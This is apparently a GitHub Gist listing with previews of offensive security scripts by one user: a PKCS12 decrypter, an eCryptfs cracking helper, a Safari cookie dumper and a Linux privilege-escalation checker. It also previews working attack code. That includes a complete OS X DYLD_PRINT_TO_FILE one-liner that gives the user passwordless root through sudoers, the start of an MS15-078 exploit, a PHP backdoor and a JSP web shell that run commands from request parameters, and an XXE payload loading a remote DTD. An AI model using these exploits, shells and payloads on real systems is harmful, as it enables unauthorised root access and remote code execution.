@sh1n0b1
sh1n0b1 / p12decrypt.php
Created September 30, 2015 00:54
Decrypt strings encrypted by PKCS12 keys
<?php
$p12cert = array();
$file = '[PATH]';
$c = file_get_contents($file);
if (openssl_pkcs12_read($c, $p12cert, '[REDACTED]') )
{
$pkey = $p12cert['pkey']; //private key
$cert = $p12cert['cert']; //public key
//decrypt the encrypted parameter value
@sh1n0b1
sh1n0b1 / dump.pl
Created September 17, 2015 22:30
pcap SSL packet dump for Wireshark to decrypt - https://supportforums.cisco.com/blog/154046
#!/usr/bin/perl
#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013
use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;
#!/usr/bin/env python
# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#
@sh1n0b1
sh1n0b1 / BinaryCookieReader.py
Created August 28, 2015 20:46
BinaryCookieReader
#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net) #
# #
# For any bug fixes contact me: satishb3@securitylearn.net #
# #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath #
# #
# Safari browser and iOS applications store the persistent cookies in a binary #
# file named Cookies.binarycookies. BinaryCookieReader is used to dump all the #
# cookies from the binary Cookies.binarycookies file. #
@sh1n0b1
sh1n0b1 / escalate.sh
Created July 25, 2015 00:13
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability
# It should work for OS X 10.10-10.10.4
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
@sh1n0b1
sh1n0b1 / elevator.c
Created July 24, 2015 23:55
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"
//include OTF
#include "font.h" // foofont is fetched from loader config struct
//#include "cert.h"
@sh1n0b1
sh1n0b1 / php_shell.php
Created July 16, 2015 08:53
PHP backdoor
<?php
//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
$token = $_GET['token'];
if ($token == $allowedToken){
echo system($_GET['cmd']);
}else{
header("HTTP/1.0 404 Not Found");
@sh1n0b1
sh1n0b1 / linuxprivchecker.py
Created July 13, 2015 23:36
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %>
-->
</head>
<body>
</body>
</html>
@sh1n0b1
sh1n0b1 / XXE.php
Last active July 4, 2017 04:17
XML External Entity Injection
<?php
$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));